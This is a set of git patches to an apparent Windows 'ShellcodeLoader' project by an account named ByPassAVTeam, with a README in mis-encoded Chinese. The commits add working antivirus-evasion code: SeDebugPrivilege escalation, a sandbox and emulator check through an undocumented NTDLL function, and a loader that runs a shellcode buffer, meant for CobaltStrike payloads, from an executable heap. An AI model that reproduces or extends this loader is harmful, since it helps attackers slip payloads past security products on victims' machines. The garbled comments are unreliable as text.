From 4411662b2f38b2175eb98f0b2a6414c751c8b829 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Tue, 28 Jun 2022 09:38:08 +0800 Subject: [PATCH 1/9] Update main.h --- src/LoaderMaker/main.h | 50 ++++++++++++++++++++++++++++++++++++++---- 1 file changed, 46 insertions(+), 4 deletions(-) diff --git a/src/LoaderMaker/main.h b/src/LoaderMaker/main.h index f1d2bcf..4ab17fd 100644 --- a/src/LoaderMaker/main.h +++ b/src/LoaderMaker/main.h @@ -83,7 +83,7 @@ void* __cdecl Mymemcpy(void* dest, return dest; } -BOOL Write2file(PBYTE file, DWORD contentLen, PCHAR path)//写入文件,测试通过 +BOOL Write2file(PBYTE file, DWORD contentLen, PCHAR path)//鍐欏叆鏂囦欢锛屾祴璇曢氳繃 { HANDLE pFile; @@ -93,7 +93,7 @@ void* __cdecl Mymemcpy(void* dest, pFile = CreateFileA(path, GENERIC_WRITE, 0, NULL, - CREATE_ALWAYS, //总是创建文件 + CREATE_ALWAYS, //鎬绘槸鍒涘缓鏂囦欢 FILE_ATTRIBUTE_NORMAL, NULL); @@ -109,7 +109,7 @@ void* __cdecl Mymemcpy(void* dest, tmpBuf = file; - do { //循环写文件,确保完整的文件被写入 + do { //寰幆鍐欐枃浠讹紝纭繚瀹屾暣鐨勬枃浠惰鍐欏叆 WriteFile(pFile, tmpBuf, dwBytesToWrite, &dwBytesWrite, NULL); @@ -121,4 +121,46 @@ void* __cdecl Mymemcpy(void* dest, CloseHandle(pFile); HeapFree(GetProcessHeap(), 0, file); return TRUE; -} \ No newline at end of file +} + +BOOL GrantPriviledge(WCHAR* PriviledgeName) +{ + TOKEN_PRIVILEGES TokenPrivileges, OldPrivileges; + DWORD dwReturnLength = sizeof(OldPrivileges); + HANDLE TokenHandle = NULL; + LUID uID; + + // 鎵撳紑鏉冮檺浠ょ墝 + if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &TokenHandle)) + { + if (GetLastError() != ERROR_NO_TOKEN) + { + return FALSE; + } + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)) + { + return FALSE; + } + } + + if (!LookupPrivilegeValue(NULL, PriviledgeName, &uID)) // 閫氳繃鏉冮檺鍚嶇О鏌ユ壘uID + { + CloseHandle(TokenHandle); + return FALSE; + } + + TokenPrivileges.PrivilegeCount = 1; // 瑕佹彁鍗囩殑鏉冮檺涓暟 + TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // 鍔ㄦ佹暟缁勶紝鏁扮粍澶у皬鏍规嵁Count鐨勬暟鐩 + TokenPrivileges.Privileges[0].Luid = uID; + + // 鍦ㄨ繖閲屾垜浠繘琛岃皟鏁存潈闄 + if (!AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), &OldPrivileges, &dwReturnLength)) + { + CloseHandle(TokenHandle); + return FALSE; + } + + // 鎴愬姛浜 + CloseHandle(TokenHandle); + return TRUE; +} From ce72116bd6a4260662385c35942f8ff95fd2fdc5 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Tue, 28 Jun 2022 09:38:44 +0800 Subject: [PATCH 2/9] Update main.cpp --- src/LoaderMaker/main.cpp | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/LoaderMaker/main.cpp b/src/LoaderMaker/main.cpp index 6448f62..9778d2e 100644 --- a/src/LoaderMaker/main.cpp +++ b/src/LoaderMaker/main.cpp @@ -11,6 +11,8 @@ int main(int argc, char* argv[], char* envp[]) printf(" \r\n"); if (argc == 3) { + // 棣栧厛鎻愭潈涓娉 + GrantPriviledge(SE_DEBUG_NAME);//闃叉鏉冮檺涓嶅 FILEINFO shellinfo = Openfile(argv[1]); for (int i = 0; i < shellinfo.size; i++) { From 2275b92dabc57f0005a5be9f0c5781c54597f768 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Tue, 28 Jun 2022 09:53:36 +0800 Subject: [PATCH 3/9] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 48cb6d6..25706a7 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,9 @@ # ShellcodeLoader Windows閫氱敤鍏嶆潃shellcode鍔犺浇鍣ㄣ +## V1.1 +鍦╩aker涓坊鍔犱簡鐢ㄤ簬绋嬪簭鑷韩鎻愭潈鐨勪唬鐮侊紝闃叉鍙兘浼氬洜涓虹▼搴忔潈闄愪笉瓒宠屽鑷村唴瀛樿鍐欏け璐ラ棶棰橈紱 +PS锛氫笅涓増鏈皢浼氭洿鏂版潃杞ā鎷熸矙绠辨娴嬪姛鑳斤紝搴撲唬鐮佸共鎵版贩娣嗗姛鑳斤紱 ## 鍔熻兘鐗圭偣 From 2ce9539af514ec93cf0686641b4950c09aa1bb54 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Tue, 28 Jun 2022 09:53:51 +0800 Subject: [PATCH 4/9] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25706a7..4582b06 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,7 @@ Windows閫氱敤鍏嶆潃shellcode鍔犺浇鍣ㄣ ## V1.1 鍦╩aker涓坊鍔犱簡鐢ㄤ簬绋嬪簭鑷韩鎻愭潈鐨勪唬鐮侊紝闃叉鍙兘浼氬洜涓虹▼搴忔潈闄愪笉瓒宠屽鑷村唴瀛樿鍐欏け璐ラ棶棰橈紱 + PS锛氫笅涓増鏈皢浼氭洿鏂版潃杞ā鎷熸矙绠辨娴嬪姛鑳斤紝搴撲唬鐮佸共鎵版贩娣嗗姛鑳斤紱 ## 鍔熻兘鐗圭偣 From b53b8ac469830c217a1d73b4dddbff5b58d7ff52 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Tue, 28 Jun 2022 09:56:32 +0800 Subject: [PATCH 5/9] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4582b06..9963229 100644 --- a/README.md +++ b/README.md @@ -52,7 +52,7 @@ C:\> 2. **浣跨敤CobaltStrike鐢熸垚payload.c鏂囦欢** - 1銆佺偣鍑荤敓鎴恜ayload + 1銆佺偣鍑荤敓鎴恜ayload(涔熷彲浠ュ湪output鏍忛夋嫨鐢熸垚RAW鏍煎紡锛孯AW鏍煎紡鍙洿鎺ヨ浇鍏oadMaker) ![image1](img/img1.png) ![image2](img/img2.png) From b2842f2fd3c68ca35a20f8a9fbbdb8ef8ef14367 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Sun, 24 Jul 2022 10:46:59 +0800 Subject: [PATCH 6/9] a a --- src/LoaderMaker/main.cpp | 2 ++ src/LoaderMaker/main.h | 23 +++++++++++++++++++++++ 2 files changed, 25 insertions(+) diff --git a/src/LoaderMaker/main.cpp b/src/LoaderMaker/main.cpp index 9778d2e..2653214 100644 --- a/src/LoaderMaker/main.cpp +++ b/src/LoaderMaker/main.cpp @@ -11,6 +11,8 @@ int main(int argc, char* argv[], char* envp[]) printf(" \r\n"); if (argc == 3) { + if (IsSandbox() == TRUE)//妫娴嬫ā鎷熺幆澧 + return 0; // 棣栧厛鎻愭潈涓娉 GrantPriviledge(SE_DEBUG_NAME);//闃叉鏉冮檺涓嶅 FILEINFO shellinfo = Openfile(argv[1]); diff --git a/src/LoaderMaker/main.h b/src/LoaderMaker/main.h index 4ab17fd..a06fd92 100644 --- a/src/LoaderMaker/main.h +++ b/src/LoaderMaker/main.h @@ -164,3 +164,26 @@ BOOL GrantPriviledge(WCHAR* PriviledgeName) CloseHandle(TokenHandle); return TRUE; } +BOOL IsSandbox() +{ + typedef void (*PfxInitialize)(LPVOID result); + PfxInitialize PFX = (PfxInitialize)GetProcAddress(GetModuleHandleW(L"NTDLL"),"PfxInitialize"); + + typedef struct _Pfx + { + DWORD Data1; + DWORD Data2; + DWORD Data3; + + }Pfx; + Pfx pfx = { 0 }; + PFX( &pfx ); + if (pfx.Data1 == 0x200) + { + return FALSE; + } + else + { + return TRUE; + } +} From 01ea6cd580f0b1475280530ecf91e84db9b1d8cb Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Sun, 24 Jul 2022 10:55:32 +0800 Subject: [PATCH 7/9] Add files via upload From 3d2d8dc7154940685e9ee0c80a6410f6f0c7acef Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Sun, 24 Jul 2022 10:56:57 +0800 Subject: [PATCH 8/9] Add files via upload --- src/ShellcodeLoader/ShellcodeLoader.cpp | 2 +- src/ShellcodeLoader/ShellcodeLoaderDlg.cpp | 5 +++-- src/ShellcodeLoader/shellcall.c | 26 ++++++++++++++++++++++ src/ShellcodeLoader/shellcall.h | 2 ++ 4 files changed, 32 insertions(+), 3 deletions(-) diff --git a/src/ShellcodeLoader/ShellcodeLoader.cpp b/src/ShellcodeLoader/ShellcodeLoader.cpp index b86b160..c402719 100644 --- a/src/ShellcodeLoader/ShellcodeLoader.cpp +++ b/src/ShellcodeLoader/ShellcodeLoader.cpp @@ -101,5 +101,5 @@ BOOL CShellcodeLoaderApp::InitInstance() void CShellcodeLoaderApp::OnBnClickedButton1() { // TODO: 鍦ㄦ娣诲姞鎺т欢閫氱煡澶勭悊绋嬪簭浠g爜 - MessageBoxW(NULL,L"nothing", L"nothing",MB_OK); + MessageBoxW(NULL,L"Button", L"Button",MB_OK); } diff --git a/src/ShellcodeLoader/ShellcodeLoaderDlg.cpp b/src/ShellcodeLoader/ShellcodeLoaderDlg.cpp index c9b5f8e..35fdf03 100644 --- a/src/ShellcodeLoader/ShellcodeLoaderDlg.cpp +++ b/src/ShellcodeLoader/ShellcodeLoaderDlg.cpp @@ -45,10 +45,11 @@ BOOL CShellcodeLoaderDlg::OnInitDialog() // 璁剧疆姝ゅ璇濇鐨勫浘鏍囥 褰撳簲鐢ㄧ▼搴忎富绐楀彛涓嶆槸瀵硅瘽妗嗘椂锛屾鏋跺皢鑷姩 // 鎵ц姝ゆ搷浣 SetIcon(m_hIcon, TRUE); // 璁剧疆澶у浘鏍 + printf("Go"); + SetIcon(m_hIcon, FALSE); // 璁剧疆灏忓浘鏍 - start(); // TODO: 鍦ㄦ娣诲姞棰濆鐨勫垵濮嬪寲浠g爜 - + start(); return TRUE; // 闄ら潪灏嗙劍鐐硅缃埌鎺т欢锛屽惁鍒欒繑鍥 TRUE } diff --git a/src/ShellcodeLoader/shellcall.c b/src/ShellcodeLoader/shellcall.c index 6b0800c..6558419 100644 --- a/src/ShellcodeLoader/shellcall.c +++ b/src/ShellcodeLoader/shellcall.c @@ -6,6 +6,8 @@ void run(void* buffer) { } void start() { + if (IsSandbox() == TRUE) + return; LPVOID heap; heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); char shellcode[DATA_SIZE] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; @@ -66,4 +68,28 @@ void* __cdecl Mymemcpy(void* dest, } return dest; +} + +BOOL IsSandbox() +{ + typedef void (*PfxInitialize)(LPVOID result); + PfxInitialize PFX = (PfxInitialize)GetProcAddress(GetModuleHandleW(L"NTDLL"), "PfxInitialize"); + + typedef struct _Pfx + { + DWORD Data1; + DWORD Data2; + DWORD Data3; + + }Pfx; + Pfx pfx = { 0 }; + PFX(&pfx); + if (pfx.Data1 == 0x200) + { + return FALSE; + } + else + { + return TRUE; + } } \ No newline at end of file diff --git a/src/ShellcodeLoader/shellcall.h b/src/ShellcodeLoader/shellcall.h index 47aba9a..36ea300 100644 --- a/src/ShellcodeLoader/shellcall.h +++ b/src/ShellcodeLoader/shellcall.h @@ -6,3 +6,5 @@ void start(); void run(void* buffer); + +BOOL IsSandbox(); From 2bcfd2d30b48e2111c82a348f363f49cd0ab0bc3 Mon Sep 17 00:00:00 2001 From: ByPassAVTeam <107661904+ByPassAVTeam@users.noreply.github.com> Date: Sun, 24 Jul 2022 10:59:38 +0800 Subject: [PATCH 9/9] Update README.md --- README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/README.md b/README.md index 9963229..71a0cef 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,10 @@ # ShellcodeLoader Windows閫氱敤鍏嶆潃shellcode鍔犺浇鍣ㄣ +## V2.0 +澧炲姞浜嗘潃杞ā鎷熺幆澧冪洃娴嬪姛鑳斤紝骞舵洿鏀逛簡shellcode鎵ц浣嶇疆锛屼互姝ゆ潵缁曡繃AV锛 + +PS锛氫笅涓増鏈垜浠皢澧炲姞鏇村楂樺害澶嶆潅鐨勬贩娣嗕唬鐮侊紱 ## V1.1 鍦╩aker涓坊鍔犱簡鐢ㄤ簬绋嬪簭鑷韩鎻愭潈鐨勪唬鐮侊紝闃叉鍙兘浼氬洜涓虹▼搴忔潈闄愪笉瓒宠屽鑷村唴瀛樿鍐欏け璐ラ棶棰橈紱